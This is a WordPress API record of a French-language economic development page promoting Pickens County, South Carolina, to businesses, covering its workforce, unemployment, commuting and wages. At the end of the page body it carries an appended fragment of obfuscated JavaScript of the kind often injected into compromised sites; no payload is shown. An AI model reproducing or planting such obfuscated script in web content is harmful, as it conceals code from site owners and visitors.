{"id":8153,"date":"2020-10-28T16:07:59","date_gmt":"2020-10-28T16:07:59","guid":{"rendered":"http:\/\/alliancepickens.com\/climat-des-affaires\/conditions-du-marche\/"},"modified":"2020-12-09T20:33:43","modified_gmt":"2020-12-09T20:33:43","slug":"conditions-du-marche","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/","title":{"rendered":"Conditions du march\u00e9"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises.<\/p>\n<p>&nbsp;<\/p>\n<h2>Disponibilit\u00e9<\/h2>\n<p>Avec pr\u00e8s de 50.000 travailleurs dans le comt\u00e9 de 45 minutes de route temps de travail zone de tirage de la main-d\u2019\u0153uvre, les entreprises nouvelles et existantes ont acc\u00e8s \u00e0 un groupe important et diversifi\u00e9 d\u2019employ\u00e9s potentiels. La Caroline du Sud jouit de relations stables employeur-employ\u00e9 en tant qu\u2019\u00c9tat du droit au travail et de l\u2019emploi \u00e0 volont\u00e9. Les entreprises qui cherchent \u00e0 s\u2019agrandir ou \u00e0 d\u00e9m\u00e9nager dans la r\u00e9gion b\u00e9n\u00e9ficieront d\u2019un bassin de main-d\u2019\u0153uvre de qualit\u00e9 soutenu par une excellente infrastructure de formation technique.<\/p>\n<p>Le bassin de main-d\u2019\u0153uvre provient de la recherche de 45 minutes en temps de trajet en voiture du Conseil des Appalaches. L\u2019origine du temps d\u2019entra\u00eenement est situ\u00e9e au Pickens County Commerce Park. Pour un examen d\u00e9taill\u00e9 du tirage au sort du travail en fonction d\u2019une propri\u00e9t\u00e9 sp\u00e9cifique, s\u2019il vous pla\u00eet contacter <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">Alliance Pickens<\/a>.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602084461637\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" style=\"border: none;\" src=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" alt=\" \" \/><\/a><\/div>\n<p>var divElement = document.getElementById(&#8216;viz1602084461637&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; vizElement.style.width=&#8217;1015px&#8217;;vizElement.style.height=&#8217;750px&#8217;; var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; bg_type=&#8221;bg_color&#8221; bg_color_value=&#8221;#e3e3e3&#8243; css=&#8221;.vc_custom_1602106944486{padding-top: 50px !important;padding-bottom: 50px !important;}&#8221; el_class=&#8221;greybar&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106834271{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Ch\u00f4mage<\/h3>\n<p>En raison de la comp\u00e9tence et l\u2019\u00e9thique de travail solide de ses r\u00e9sidents, le taux de <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11618\">ch\u00f4mage<\/a> du comt\u00e9 de Pickens est l\u2019un des plus bas de l\u2019\u00c9tat. Pour plus d\u2019informations, veuillez visiter le site Web de SC DEW.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106840509{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Sous-emploi<\/h3>\n<p>Les entreprises du comt\u00e9 de Pickens ont \u00e9galement acc\u00e8s \u00e0 un certain nombre d\u2019employ\u00e9s potentiels qui ont actuellement un emploi, mais <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11624\">poss\u00e8dent la formation, l\u2019exp\u00e9rience et l\u2019\u00e9ducation <\/a>qui les qualifie pour un meilleur emploi.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106846938{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Participation de la main-d\u2019\u0153uvre<\/h3>\n<p>La participation \u00e0 la main-d\u2019\u0153uvre est le nombre de personnes qui postulent pour un emploi ou qui occupent un emploi.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106856497{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Mod\u00e8les de d\u00e9placement<\/h3>\n<p>Les entreprises du comt\u00e9 de Pickens ont l\u2019avantage suppl\u00e9mentaire d\u2019attirer des employ\u00e9s qualifi\u00e9s de <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11639\">toute la r\u00e9gion.<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602079985845\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" style=\"border: none;\" src=\"https:\/\/public.tableau.com\/static\/images\/Pk\/Pk_LABOR\/CurrentLaborForce\/1_rss.png\" alt=\" \" \/><\/a><\/div>\n<p>var divElement = document.getElementById(&#8216;viz1602079985845&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width=&#8217;1015px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width=&#8217;1015px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else { vizElement.style.minWidth=&#8217;1015px&#8217;;vizElement.style.maxWidth=&#8217;100%&#8217;;vizElement.style.height=&#8217;1600px&#8217;;} var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10298&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;affordability&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Abordabilit\u00e9<\/h2>\n<p>[\/vc_column_text][vc_tta_tabs][vc_tta_section title=&#8221;Salaires: Tous les secteurs&#8221; tab_id=&#8221;1605029531774-039cd1d3-f69b&#8221;][vc_column_text]L\u2019abordabilit\u00e9 de la main-d\u2019\u0153uvre locale dans tous les secteurs permet aux entreprises nouvelles et en expansion de diverses industries de recruter des talents de premier plan pour r\u00e9aliser d\u2019importantes \u00e9conomies.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Salaires de fabrication&#8221; tab_id=&#8221;1605029531814-ea77b366-3a2c&#8221;][vc_column_text]Avec les pr\u00e9occupations croissantes au sujet de la fabrication \u00e0 l\u2019\u00e9tranger, tels que l\u2019augmentation des co\u00fbts de main-d\u2019\u0153uvre, l\u2019augmentation des co\u00fbts de transport, et la mauvaise qualit\u00e9 de la production, la <a href=\"http:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/\">main-d\u2019\u0153uvre de fabrication abordable et qualifi\u00e9e<\/a> du comt\u00e9 de Pickens fait de la r\u00e9gion un site id\u00e9al pour les entreprises envisageant l\u2019expansion, la r\u00e9installation ou la d\u00e9localisation.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_tta_section][\/vc_tta_tabs][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center;\">En savoir plus sur le climat des affaires<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;18&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises. &nbsp; Disponibilit\u00e9 Avec pr\u00e8s de 50.000&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8065,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8153","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conditions du march\u00e9 - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conditions du march\u00e9 - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises. &nbsp; Disponibilit\u00e9 Avec pr\u00e8s de 50.000&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:33:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/\",\"name\":\"Conditions du march\u00e9 - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"datePublished\":\"2020-10-28T16:07:59+00:00\",\"dateModified\":\"2020-12-09T20:33:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/#primaryimage\",\"url\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"contentUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/conditions-du-marche\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Climat des affaires\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/climat-des-affaires\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Conditions du march\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conditions du march\u00e9 - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/","og_locale":"fr_FR","og_type":"article","og_title":"Conditions du march\u00e9 - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises. &nbsp; Disponibilit\u00e9 Avec pr\u00e8s de 50.000&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:33:43+00:00","og_image":[{"url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/","url":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/","name":"Conditions du march\u00e9 - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/#primaryimage"},"thumbnailUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","datePublished":"2020-10-28T16:07:59+00:00","dateModified":"2020-12-09T20:33:43+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/#primaryimage","url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","contentUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/conditions-du-marche\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Climat des affaires","item":"https:\/\/alliancepickens.com\/fr\/climat-des-affaires\/"},{"@type":"ListItem","position":3,"name":"Conditions du march\u00e9"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8153","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=8153"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8153\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8065"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=8153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}